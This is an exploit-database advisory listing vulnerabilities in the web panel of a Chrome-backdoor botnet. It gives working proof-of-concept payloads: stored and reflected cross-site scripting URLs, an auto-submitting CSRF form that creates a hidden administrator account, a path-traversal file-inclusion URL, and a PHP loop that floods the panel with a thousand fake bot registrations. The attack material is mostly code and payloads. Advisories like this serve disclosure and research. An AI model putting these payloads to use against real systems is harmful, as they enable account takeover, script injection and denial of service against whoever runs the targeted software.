botnet graniet chrome backdoor v3.0 web panel multi vulnerability

2017.01.21
Credit: alqnas eslam
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: botnet graniet chrome backdoor v3.0 web panel multi vulnerability # Date: 10-1-2017 # Exploit Author: alqnas eslam # Vendor Homepage:fb.com/alqnas4 # Software Link:https://github.com/graniet/chromebackdoor # Tested on:any os 1- cross site scripting There are many xss vulnerability at graniet chrome backdoor some of them stored xss: POC: http://localhost/backdoor/web/gate.php?add=<h1>test</h1>&version=<script>alert(/xss/);</script> this POC add Bots with xss payload so when admin open admin panel the xss code will execute image of POC: https://s30.postimg.org/hdngwgxlt/Screenshot_from_2017_01_10_18_27_10.png image of source code https://s27.postimg.org/lwk1jwijn/Screenshot_from_2017_01_10_18_44_22.png reflected xss: POC: http://localhost/backdoor/web/index.php?action=info&id=1'></a><script>alert(/xxs/);</script> image of source code https://s27.postimg.org/3v0wm3oir/Screenshot_from_2017_01_10_18_45_54.png 2- csrf add user administrator <body onload="document.alqnas.submit()"> <form action="http://localhost/backdoor/web/index.php?action=settings#" method="post" name="alqnas"> <input type="hidden" name="username" value="admin-hacker" /> <input type="hidden" name="password" value="hacker-pass" /> <input type="hidden" name="role" value="0" /> <input type="hidden" name="add_user" value="Add user" /> </form> </body> image of request https://s27.postimg.org/5j020r2eb/Screenshot_from_2017_01_10_18_43_49.png 3- local file include http://localhost/backdoor/web/index.php?action=../../relais image of source code https://s27.postimg.org/4yl0y295v/Screenshot_from_2017_01_10_18_50_49.png 4- ddos add bots <?php function addbots($url) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); $output=curl_exec($ch); curl_close($ch); } //1000 are numbers you will send it $i =1; while ( $i <=1000){ $d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789"); $a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789"); $rand = substr( $d , 0 , 5 ); $shuf = substr( $a , 0 , 5 ); //change localhost to url of bot addbots("http://localhost/backdoor/web/gate.php?add=$rand&version=$shuf"); $i++; } ?>

References:

https://s30.postimg.org/hdngwgxlt/Screenshot_from_2017_01_10_18_27_10.png
https://s27.postimg.org/lwk1jwijn/Screenshot_from_2017_01_10_18_44_22.png


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top